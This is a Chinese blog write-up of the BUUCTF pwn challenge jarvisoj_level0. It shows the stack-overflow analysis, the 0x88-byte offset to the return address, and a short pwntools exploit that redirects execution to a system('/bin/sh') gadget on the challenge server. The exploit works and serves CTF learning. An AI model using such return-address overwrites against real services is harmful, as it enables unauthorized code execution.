[BUUCTF-pwn]——jarvisoj_level0

  • 题目地址:https://buuoj.cn/challenges#jarvisoj_level0
  • 题目:
    还是先下载下来在Linux上checksex一下,基本确实又是栈溢出了。

    64位,所以我们用64位的IDA打开,没什么有用的信息,点开vulnerable_function函数

    发现栈溢出的read函数,前面为0意味着标准读入,后面的长度也可以。没毛病就是这个地方了。

    再翻翻其他函数,发现了我们想要的system函数。找到位置,和需要覆盖的返回地址。看过我之前的博文的人都知道,我比较喜欢system压参的位置。


    再看看buf这个局部变量,先想要覆盖需要0x80 + 0x8的距离


expolit

from pwn import *
p = remote("node3.buuoj.cn",xxxx)
ret_arr = 0X40059A
payload = 'a'*(0x80 + 0x8) + p64(ret_arr)
p.sendline(payload)
p.interactive()

点赞点赞点赞,兄弟们、姐妹们、家人们!!!

[BUUCTF-pwn]——jarvisoj_level0相关推荐

  1. 持续更新 BUUCTF——PWN(一)

    文章目录 前言 test_your_nc rip warmup_csaw_2016 ciscn_2019_n_1 pwn1_sctf_2016 jarvisoj_level0 [第五空间2019 决赛 ...

  2. BUUCTF Pwn warmup

    BUUCTF Pwn warmup 1.题目下载地址 2.checksec检查保护 3.IDA静态分析 4.exp 1.题目下载地址 点击下载题目 2.checksec检查保护 啥都没开,果然是war ...

  3. BUUCTF PWN rip1 WP

    BUUCTF   PWN   rip 1 这是一个WP,也是一个自己练习过程的记录. 先把文件放入pwn机中检查一下,发现并没有开启保护,所以应该是一道简单题 我们运行一下试试,它让你输入一段字符然后 ...

  4. buuctf pwn bjdctf_2020_babyrop

    buuctf pwn bjdctf_2020_babyrop 1.checksec 2.IDA分析 ropper 3.exp 1.checksec 运行一下 2.IDA分析 这里调用了vuln函数 我 ...

  5. 持续更新 BUUCTF——PWN(二)

    文章目录 前言 0ctf_2017_babyheap ciscn_2019_s_9 hitcon2014_stkof roarctf_2019_easy_pwn picoctf_2018_shellc ...

  6. BUUCTF PWN 刷题 1-15题

    1 rip 经典栈溢出漏洞. from pwn import *p = remote('node4.buuoj.cn', 27181)payload = b'a' * 23 + p64(0x40118 ...

  7. 持续更新 BUUCTF——PWN(三)

    文章目录 前言 axb_2019_heap oneshot_tjctf_2016 护网杯_2018_gettingstart wustctf2020_number_game zctf2016_note ...

  8. Buuctf(pwn) picoctf_2018_rop chain 栈溢出

    32位,开启了NX保护 利用思路 首先溢出后覆盖ret为function1函数地址,将win1赋值为1,之后跳转到function2的地址,a1是传入的参数,将a1传入即可满足条件去设置win2的值为 ...

  9. BUUCTF(pwn) jarvisoj_level4 栈溢出,泄露libc

    思路 我们没有system和'/bin/sh'地址.也不知道libc版本, 我们可以先leek出来一个地址, 利用偏移找到system和'/bin/sh'地址.再返回main进行循环调用,第二次就可以 ...

  10. Buuctf(pwn) jarvisoj_tell_me_something 栈溢出

    64位程序,开启了NX保护 400620 from pwn import *r=remote('node4.buuoj.cn',29273)flag_addr=0x400620payload='a'* ...

最新文章

  1. Postfix无法正常发送邮件故障的排除
  2. 【收藏】goland报错:报错package xxx is not in GOROOT or GOPATH 或者 cannot find package “xxx“ in any of
  3. Sql查找断号区间...
  4. 传统MVP用在项目中是真的方便还是累赘?
  5. ECG的滤波和检波资源汇总
  6. python integer函数_python - Floor函数消除了Integer科学符号,Python - 堆栈内存溢出
  7. fseek函数、ftell函数和rewind函数
  8. U盘0字节,无法格式化,无法打开解决办法
  9. Hair-Gan论文翻译
  10. HDU-3605 Escape
  11. 父组件访问子组件的方法或参数 (子组件暴漏出方法defineExpose)
  12. 求字符串中的回文数或者是回文单词
  13. 嵌入式linux+程序构架,从头开始构建一个嵌入式 Linux 发行版
  14. 如何利用fooview实现钉钉自动打卡
  15. MySQL数据库设计规范
  16. Navicat premium 12 破解版下载及安装过程
  17. 【课上笔记】第七章 树与森林
  18. iOS10.1.1越狱插件推荐——DarkAppleStore
  19. 利用虚拟光驱实现 将WINDOWS文件供虚拟机中的UBUNTU共享
  20. Matlab p文件解密,pcode解密,甚至exe文件解密!

热门文章

  1. 【转】HashTable 和 HashMap的区别
  2. windows残留软件卸载
  3. [Python人工智能] 八.卷积神经网络CNN原理详解及TensorFlow编写CNN
  4. [Python图像处理] 二十三.傅里叶变换之高通滤波和低通滤波
  5. iOS之性能优化·列表异步绘制
  6. 343. Integer Break
  7. Linux基础 —— Linux命令简介
  8. ZYAR20A 亚克力2驱 蓝牙 298寻迹避障机器人 —— 小车前后左右综合实验
  9. Python递归实现汉诺塔
  10. 【Tools】VMware Workstation 15.5 Pro安装详解